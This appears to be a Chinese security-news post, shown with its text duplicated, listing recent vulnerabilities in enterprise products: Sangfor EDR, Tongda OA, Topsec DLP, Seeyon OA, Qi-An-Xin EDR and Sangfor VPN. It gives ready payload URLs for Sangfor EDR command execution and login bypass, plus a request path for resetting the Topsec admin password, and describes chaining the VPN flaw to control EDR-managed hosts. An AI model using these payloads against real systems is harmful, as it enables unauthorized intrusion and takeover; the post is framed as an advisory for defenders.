近期暴露出很多0day及新的漏洞,下面对获取到的一些信息进行了汇总...
请勿使用以下漏洞进行非法活动及未授权测试!!
一、深信服EDR设备RCE:
Payload:https://ip/tool/log/c.php?strip_slashes=system&host=id
二、深信服EDR设备任意用户登录登录:
Payload:https://ip/ui/login.php?user=admin
通过更改user参数的值即可实现任意用户登录
三、通达OA-v11.6 Getshell:
复现该漏洞会删除auth.inc.php,可能会导致应用的正常使用请勿进行未授权测试
后台回复‘通达oa’可获取利用代码
四、天融信dlp-未授权+越权:
漏洞细节:管理员登录系统系统之后修改密码,未采用原密码校验,且存在未授权访问导致存在越权修改管理员密码。
默认用户superman的uid=1
POST /?module-auth_user&action=mod_edit.pwd HTTP/1.1
五、致远OA-A8-V5最新版:GETshell-某大佬暂未公开
六、奇安信天擎EDR设备RCE:漏洞详情暂未知
影响范围:使用奇安信天擎EDR产品的主机
可以利用深信服vpn漏洞进入内网,然后利用此漏洞控制所有装有edr的机器
七、深信服vpn RCE:漏洞详情暂未知
最后:
近期蓝队应该关注的漏洞:
近期暴露出很多0day及新的漏洞,下面对获取到的一些信息进行了汇总...
请勿使用以下漏洞进行非法活动及未授权测试!!
一、深信服EDR设备RCE:
Payload:https://ip/tool/log/c.php?strip_slashes=system&host=id
二、深信服EDR设备任意用户登录登录:
Payload:https://ip/ui/login.php?user=admin
通过更改user参数的值即可实现任意用户登录
三、通达OA-v11.6 Getshell:
复现该漏洞会删除auth.inc.php,可能会导致应用的正常使用请勿进行未授权测试
后台回复‘通达oa’可获取利用代码
四、天融信dlp-未授权+越权:
漏洞细节:管理员登录系统系统之后修改密码,未采用原密码校验,且存在未授权访问导致存在越权修改管理员密码。
默认用户superman的uid=1
POST /?module-auth_user&action=mod_edit.pwd HTTP/1.1
五、致远OA-A8-V5最新版:GETshell-某大佬暂未公开
六、奇安信天擎EDR设备RCE:漏洞详情暂未知
影响范围:使用奇安信天擎EDR产品的主机
可以利用深信服vpn漏洞进入内网,然后利用此漏洞控制所有装有edr的机器
七、深信服vpn RCE:漏洞详情暂未知
最后:
近期蓝队应该关注的漏洞:
- [ 2022-08-08 ] 太阳集团动态│沈昌祥院士莅临太阳集团信安考察指导
- [ 2025-04-17 ] 太阳集团动态丨安徽自贸试验区芜湖片区管委会副主任曹登军一行到tyc1286太阳成集团调研交流
- [ 2025-04-16 ] 2025全民国家安全教育日丨守护网络数据安全 护航国家数字经济发展
- [ 2025-04-14 ] tyc1286太阳成集团党支部组织开展深入贯彻中央八项规定精神学习教育专题党课和主题党日活动
- [ 2025-04-11 ] 安全资讯丨企业数据泄露频发,构建专业人才防线势在必行!
- [ 2025-04-10 ] tyc1286太阳成集团举办大模型解决实际问题能力大赛
- [ 2025-04-03 ] 成立技术服务中心!tyc1286太阳成集团与中国中检华南区域共绘融合发展新蓝图